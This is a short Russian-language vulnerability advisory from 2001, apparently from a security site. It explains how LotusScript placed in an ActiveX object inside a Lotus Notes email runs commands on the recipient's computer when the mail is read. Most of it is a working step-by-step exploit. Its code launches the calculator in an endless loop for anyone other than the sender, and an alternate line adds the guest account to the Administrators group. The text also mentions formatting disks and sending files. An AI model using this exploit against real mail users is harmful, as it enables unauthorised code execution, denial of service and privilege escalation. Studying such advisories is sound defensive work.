Security Lab

Выполднение команд в Lotus Notes

Дата публикации:23.10.2001
Всего просмотров:2026
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

С небольшим LotusScript в вашей почте, вы можете выполнять любые команды на компьютере получателя:
Пример:
1) Создайте новое письмо, добавьте получателя
2) В теле письма кликните в меню "Create..Object"
3) Выберите "Control" и любой объект типа "ActiveXPlugin Object".
4) В Client 4.6 правым кликом на объекте выберите "Properties”. В Client 5 кликните в меню свойство new "Applet", и выберите "Properties".
5) Затем выберите "Edit events".
6) В разделе "Initialize" добавьте следующий код, где "My EMAIL" – ваше учетное имя в Lotus Notes
Sub Initialize
Dim TaskId As Integer
Dim session As New NotesSession
If session.CommonUserName<>"My EMAIL" Then
Do
TaskId%=Shell("CALC.EXE",1)
Loop
End If
End Subv
7) В разделе "Terminate" выполните следующее:
Sub Terminate
Dim TaskId As Integer
Dim session As New NotesSession
If session.CommonUserName<>"My EMAIL" Then
Do
TaskId%=Shell("CALC.EXE",1)
Loop
End If
End Subv
8) Нажмите снова на раздел "Initialize"
9) Пошлите письмо.

Ваш ActiveX (или другой объект выбранный вами) выполняется во время чтения документа. В этом примере мы выполняем калькулятор в цикле, но можно делать все что угодно - форматировать жесткий диск, посылать файлы без согласия владельца и .т.п.
Например, вы можете заменить, Do .. Loop:
TaskId%=Shell("CMD.EXE /C net localgroup " \"Administrators"\" /add guest ",1)
Которая добавит учетную запись guest в группу администратора.